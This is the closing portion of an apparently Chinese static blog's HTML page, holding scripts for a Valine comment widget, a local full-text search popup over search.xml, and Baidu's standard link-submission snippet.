<script>
  var GUEST = ['nick', 'mail', 'link'];
  var guest = 'nick,mail,link';
  guest = guest.split(',').filter(function (item) {
    return GUEST.indexOf(item) > -1;
  });
  new Valine({
    el: '#comments',
    verify: false,
    notify: false,
    appId: 'LwEPiJFa7YMn2MrJdCwaUbmQ-gzGzoHsz',
    appKey: 'JqS1y3RxYvDOki9r3NcqqoO5',
    placeholder: '来都来了，不说几句就走，过分了啊！！！',
    avatar: 'monsterid',
    meta: guest,
    pageSize: '10' || 10,
    visitor: false
  });
</script>



  

  <script>
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/blog/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url).replace(/\/{2,}/g, '/');
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x"></i></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x"></i></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  
  <script>
    (function(){
      var bp = document.createElement('script');
      var curProtocol = window.location.protocol.split(':')[0];
      if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
      }
      else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
      }
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(bp, s);
    })();
  </script>


  

  

  

  

  

  

  

  

  

  

</body>
</html>
